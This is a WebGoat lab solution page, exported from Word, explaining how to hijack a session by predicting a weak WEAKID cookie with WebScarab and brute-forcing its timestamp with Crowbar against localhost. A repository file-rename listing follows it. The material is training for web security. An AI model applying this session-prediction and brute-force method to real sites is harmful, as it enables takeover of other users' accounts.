<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Wingdings;
panose-1:5 0 0 0 0 0 0 0 0 0;
mso-font-charset:2;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:0 268435456 0 0 -2147483648 0;}
@font-face
{font-family:"MS Mincho";
panose-1:2 2 6 9 4 2 5 8 3 4;
mso-font-alt:"\FF2D\FF33 \660E\671D";
mso-font-charset:128;
mso-generic-font-family:modern;
mso-font-pitch:fixed;
mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
@font-face
{font-family:"Cambria Math";
panose-1:2 4 5 3 5 4 6 3 2 4;
mso-font-charset:0;
mso-generic-font-family:roman;
mso-font-pitch:variable;
mso-font-signature:-1610611985 1107304683 0 0 159 0;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
@font-face
{font-family:"\@MS Mincho";
panose-1:2 2 6 9 4 2 5 8 3 4;
mso-font-charset:128;
mso-generic-font-family:modern;
mso-font-pitch:fixed;
mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-parent:"";
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";}
h1
{mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-link:"Heading 1 Char";
mso-style-next:Normal;
margin-top:12.0pt;
margin-right:0cm;
margin-bottom:3.0pt;
margin-left:0cm;
mso-pagination:widow-orphan;
page-break-after:avoid;
mso-outline-level:1;
font-size:16.0pt;
font-family:"Arial","sans-serif";
mso-fareast-font-family:"MS Mincho";
mso-font-kerning:16.0pt;
mso-fareast-language:JA;
font-weight:bold;}
h2
{mso-style-noshow:yes;
mso-style-priority:9;
mso-style-qformat:yes;
mso-style-link:"Heading 2 Char";
mso-style-next:Normal;
margin-top:10.0pt;
margin-right:0cm;
margin-bottom:0cm;
margin-left:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan lines-together;
page-break-after:avoid;
mso-outline-level:2;
font-size:13.0pt;
font-family:"Cambria","serif";
mso-ascii-font-family:Cambria;
mso-ascii-theme-font:major-latin;
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:major-fareast;
mso-hansi-font-family:Cambria;
mso-hansi-theme-font:major-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:major-bidi;
color:#4F81BD;
mso-themecolor:accent1;
font-weight:bold;}
p.MsoCaption, li.MsoCaption, div.MsoCaption
{mso-style-noshow:yes;
mso-style-qformat:yes;
mso-style-next:Normal;
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";
font-weight:bold;}
p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
{mso-style-noshow:yes;
mso-style-priority:99;
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:major-fareast;}
a:link, span.MsoHyperlink
{mso-style-noshow:yes;
color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{mso-style-noshow:yes;
mso-style-priority:99;
color:purple;
mso-themecolor:followedhyperlink;
text-decoration:underline;
text-underline:single;}
p
{mso-style-noshow:yes;
mso-style-priority:99;
mso-margin-top-alt:auto;
margin-right:0cm;
mso-margin-bottom-alt:auto;
margin-left:0cm;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";}
p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
{mso-style-noshow:yes;
mso-style-priority:99;
mso-style-link:"Balloon Text Char";
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:"Tahoma","sans-serif";
mso-fareast-font-family:"Times New Roman";}
span.Heading1Char
{mso-style-name:"Heading 1 Char";
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"Heading 1";
mso-ansi-font-size:16.0pt;
mso-bidi-font-size:16.0pt;
font-family:"MS Mincho";
mso-ascii-font-family:"MS Mincho";
mso-fareast-font-family:"MS Mincho";
mso-hansi-font-family:"MS Mincho";
mso-bidi-font-family:Arial;
mso-font-kerning:16.0pt;
mso-fareast-language:JA;
font-weight:bold;}
span.Heading2Char
{mso-style-name:"Heading 2 Char";
mso-style-noshow:yes;
mso-style-priority:9;
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"Heading 2";
mso-ansi-font-size:13.0pt;
mso-bidi-font-size:13.0pt;
font-family:"Cambria","serif";
mso-ascii-font-family:Cambria;
mso-ascii-theme-font:major-latin;
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:major-fareast;
mso-hansi-font-family:Cambria;
mso-hansi-theme-font:major-latin;
color:#4F81BD;
mso-themecolor:accent1;
font-weight:bold;}
span.BalloonTextChar
{mso-style-name:"Balloon Text Char";
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"Balloon Text";
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;
font-family:"Tahoma","sans-serif";
mso-ascii-font-family:Tahoma;
mso-fareast-font-family:"Times New Roman";
mso-hansi-font-family:Tahoma;
mso-bidi-font-family:Tahoma;}
.MsoChpDefault
{mso-style-type:export-only;
mso-default-props:yes;
font-size:10.0pt;
mso-ansi-font-size:10.0pt;
mso-bidi-font-size:10.0pt;
mso-ascii-font-family:Arial;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Arial;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:major-bidi;}
@page Section1
{size:612.0pt 792.0pt;
margin:72.0pt 72.0pt 72.0pt 72.0pt;
mso-header-margin:35.4pt;
mso-footer-margin:35.4pt;
mso-paper-source:0;}
div.Section1
{page:Section1;}
-->
</style>
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Arial","sans-serif";
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:major-bidi;}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="3074"/>
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout></xml><![endif]-->
</head>
<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
<div class=Section1>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
Hijack a Session<o:p></o:p></span></p>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
<!-- Start Instructions -->
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Application
developers who develop their own session IDs frequently forget to incorporate
the complexity and randomness necessary for security. If the user specific
session ID is not complex and random, then the application is highly
susceptible to session-based brute force attacks. <o:p></o:p></span></p>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Try to access
an authenticated session belonging to someone else. <o:p></o:p></span></p>
<!-- Stop Instructions -->
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>In this
lesson the purpose is to predict the WEAKID value. The WEAKID is used to
differentiate authenticated and anonymous users of WebGoat.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f"
stroked="f">
<v:stroke joinstyle="miter"/>
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0"/>
<v:f eqn="sum @0 1 0"/>
<v:f eqn="sum 0 0 @1"/>
<v:f eqn="prod @2 1 2"/>
<v:f eqn="prod @3 21600 pixelWidth"/>
<v:f eqn="prod @3 21600 pixelHeight"/>
<v:f eqn="sum @0 0 1"/>
<v:f eqn="prod @6 1 2"/>
<v:f eqn="prod @7 21600 pixelWidth"/>
<v:f eqn="sum @8 21600 0"/>
<v:f eqn="prod @7 21600 pixelHeight"/>
<v:f eqn="sum @10 21600 0"/>
</v:formulas>
<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_785" o:spid="_x0000_i1034" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="lesson_solutions/WeakSessionID_files/image020.jpg" v:shapes="Picture_x0020_785"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution:</span></b><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The easiest
way to complete this lesson is to use WebScarab's Session ID Analysis.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Go to
WebScarab and click on the button "SessionID Analysis". Select the last POST
request from the "Previous requests" drop-down box.<o:p></o:p></span></p>
<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_786"
o:spid="_x0000_i1033" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="lesson_solutions/WeakSessionID_files/image021.jpg" v:shapes="Picture_x0020_786"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
<span style='mso-element:field-separator'></span><![endif]--><span
style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
field-end'></span><![endif]--> WebScarabs SessionID Analysis<span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>To make sure
that WebScarab is able to fetch the WEAKID cookie, you need to click the "Test"
button on the bottom of the screen. A pop-up window must be shown like below.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_787"
o:spid="_x0000_i1032" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image005.png" o:title="" cropbottom="2719f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="lesson_solutions/WeakSessionID_files/image022.jpg" v:shapes="Picture_x0020_787"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
<span style='mso-element:field-separator'></span><![endif]--><span
style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
field-end'></span><![endif]--> SessionID WEAKID discovered<span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>If you dont
have a pop-up window with the Extracted Sessionids, you must edit the Request.
You must delete the WEAKID value from the request. Without this cookie value,
WebGoat will return a HTTP Header "Set-Cookie: WEAKID=value" so WebScarab
learns about this value.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Fetch 50
samples and examine the results. Enter "50" in the "Samples" window and click
the button "Fetch". You will not see any information about progress.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_788" o:spid="_x0000_i1031"
type="#_x0000_t75" style='width:480pt;height:17.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image007.png" o:title="" croptop="61471f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=23
src="lesson_solutions/WeakSessionID_files/image023.jpg" v:shapes="Picture_x0020_788"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Now you need
to go to the tab "Analysis".<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_789" o:spid="_x0000_i1030"
type="#_x0000_t75" style='width:480pt;height:53.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image007.png" o:title="" cropbottom="52914f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=71
src="lesson_solutions/WeakSessionID_files/image024.jpg" v:shapes="Picture_x0020_789"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>In the "Analysis"
pane you see nothing. <o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_790" o:spid="_x0000_i1029"
type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image010.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="lesson_solutions/WeakSessionID_files/image025.jpg" v:shapes="Picture_x0020_790"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>You must
select the Session Identifier WEAKID value from the drop-down box.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_791" o:spid="_x0000_i1028"
type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image012.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="lesson_solutions/WeakSessionID_files/image026.jpg" v:shapes="Picture_x0020_791"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The WEAKID is
divided in 2 parts: the first part is an identifier that is added 1 in every
cookie and a time value. The time value is calculated at the moment that you
submit the request.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Notice that
there is sometimes a gap in the first value of the WEAKID, skipping with 1. The
value that is missing is the value that you need to know to log on. Now you
only need to calculate the timestamp. This can be brute-forced using Crowbar.
You know the previous timestamp and the next timestamp so you have a start and
end value.<br>
You can download Crowbar for free: <a href="http://www.sensepost.com/research/crowbar/" target="_blank">http://www.sensepost.com/research/crowbar/</a>
<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_792" o:spid="_x0000_i1027"
type="#_x0000_t75" style='width:480.75pt;height:338.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image014.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=641 height=451
src="lesson_solutions/WeakSessionID_files/image027.jpg" v:shapes="Picture_x0020_792"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>There is a
value 16935 and a value 16937 with a numeric difference of 28110 instead of
14109, so there the WEAKID cookie is located. Copy and paste the raw HTTP
request in Crowbar:<o:p></o:p></span></p>
<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_793"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:447pt;height:382.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image016.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=596 height=510
src="lesson_solutions/WeakSessionID_files/image028.jpg" v:shapes="Picture_x0020_793"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
<span style='mso-element:field-separator'></span><![endif]--><span
style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
field-end'></span><![endif]--> Crowbar<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Change target
to localhost and adjust the port.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Create a Base
response. Make sure that you see "How to hijack a session" in the middle
window.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Insert ##1##
in the WEAKID parameter where you want to brute-force the value and be aware, that the first part of the WEAKID is the one we are searching for (16936).
The WEAKID in Crowbar lookes like this: Cookie: JSESSIONID=...; WEAKID=1693<font color="ff0000">6</font>-1163685<font color="ff0000">##1##</font>;<br>
Start the first loop at 363093, the last digits of the last cookie before the
authentication cookie and 363203, the first cookie after the authentication
cookie. You have to enter these two values in the Parameter1 fields. We have to brute-force these values, but we are sure that they lie
between these two boundaries.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Examine the
results until you see a different fuzzy logic value (the blue line in Figure 3), right-click it and click on "Show
reply".<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_794"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:481.5pt;height:345.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image018.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=461
src="lesson_solutions/WeakSessionID_files/image029.jpg" v:shapes="Picture_x0020_794"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
<span style='mso-element:field-separator'></span><![endif]--><span
style='mso-no-proof:yes'>4</span><!--[if supportFields]><span style='mso-element:
field-end'></span><![endif]--> Lesson 12 Completed<span style='font-family:
"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><o:p>&nbsp;</o:p></p>
</div>
<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
<tr>
<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
Solution by Erwin Geirnaert
</td>
<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
</tr>
</table>
</body>
</html>

BIN
src/main/webapp/lesson_solutions/WeakSessionID_files/image001.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 207 KiB

BIN
src/main/webapp/lesson_solutions/WeakSessionID_files/image002.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 186 KiB

BIN
src/main/webapp/lesson_solutions/WeakSessionID_files/image003.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 226 KiB

BIN
src/main/webapp/lesson_solutions/WeakSessionID_files/image004.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 161 KiB

BIN
src/main/webapp/lesson_solutions/WeakSessionID_files/image005.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 221 KiB

BIN
src/main/webapp/lesson_solutions/WeakSessionID_files/image006.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 167 KiB

0
src/main/webapp/lesson_solutions/WeakSessionID_files/colorschememapping.xml → src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/colorschememapping.xml
View File

0
src/main/webapp/lesson_solutions/WeakSessionID_files/filelist.xml → src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/filelist.xml
View File

0
src/main/webapp/lesson_solutions/WeakSessionID_files/image001.png → src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image001.png
View File

Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 164 KiB

After

Width:  |  Height:  |  Size: 164 KiB

0
src/main/webapp/lesson_solutions/WeakSessionID_files/image003.png → src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image003.png
View File

Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 41 KiB

After

Width:  |  Height:  |  Size: 41 KiB

0
src/main/webapp/lesson_solutions/WeakSessionID_files/image005.png → src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image005.png
View File

Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 66 KiB

After

Width:  |  Height:  |  Size: 66 KiB

0
src/main/webapp/lesson_solutions/WeakSessionID_files/image007.png → src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image007.png
View File

Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 43 KiB

After

Width:  |  Height:  |  Size: 43 KiB

0
src/main/webapp/lesson_solutions/WeakSessionID_files/image010.png → src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image010.png
View File

Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 29 KiB

After

Width:  |  Height:  |  Size: 29 KiB

0
src/main/webapp/lesson_solutions/WeakSessionID_files/image012.png → src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image012.png
View File

Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 27 KiB

After

Width:  |  Height:  |  Size: 27 KiB

0
src/main/webapp/lesson_solutions/WeakSessionID_files/image014.png → src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image014.png
View File

Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 52 KiB

After

Width:  |  Height:  |  Size: 52 KiB

0
src/main/webapp/lesson_solutions/WeakSessionID_files/image016.png → src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image016.png
View File

Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 60 KiB

After

Width:  |  Height:  |  Size: 60 KiB

0
src/main/webapp/lesson_solutions/WeakSessionID_files/image018.png → src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image018.png
View File

Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 23 KiB

After

Width:  |  Height:  |  Size: 23 KiB

0
src/main/webapp/lesson_solutions/WeakSessionID_files/image020.jpg → src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image020.jpg
View File

Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 30 KiB

After

Width:  |  Height:  |  Size: 30 KiB

0
src/main/webapp/lesson_solutions/WeakSessionID_files/image021.jpg → src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image021.jpg
View File

Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 40 KiB

After

Width:  |  Height:  |  Size: 40 KiB

0
src/main/webapp/lesson_solutions/WeakSessionID_files/image022.jpg → src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image022.jpg
View File

Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 42 KiB

After

Width:  |  Height:  |  Size: 42 KiB

0
src/main/webapp/lesson_solutions/WeakSessionID_files/image023.jpg → src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image023.jpg
View File

Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 2.8 KiB

After

Width:  |  Height:  |  Size: 2.8 KiB

0
src/main/webapp/lesson_solutions/WeakSessionID_files/image024.jpg → src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image024.jpg
View File

Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 10 KiB

After

Width:  |  Height:  |  Size: 10 KiB

0
src/main/webapp/lesson_solutions/WeakSessionID_files/image025.jpg → src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image025.jpg
View File

Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 19 KiB

After

Width:  |  Height:  |  Size: 19 KiB

0
src/main/webapp/lesson_solutions/WeakSessionID_files/image026.jpg → src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image026.jpg
View File

Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 20 KiB

After

Width:  |  Height:  |  Size: 20 KiB

0
src/main/webapp/lesson_solutions/WeakSessionID_files/image027.jpg → src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image027.jpg
View File

Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 66 KiB

After

Width:  |  Height:  |  Size: 66 KiB

0
src/main/webapp/lesson_solutions/WeakSessionID_files/image028.jpg → src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image028.jpg
View File

Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 55 KiB

After

Width:  |  Height:  |  Size: 55 KiB

0
src/main/webapp/lesson_solutions/WeakSessionID_files/image029.jpg → src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image029.jpg
View File

Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 29 KiB

After

Width:  |  Height:  |  Size: 29 KiB

0
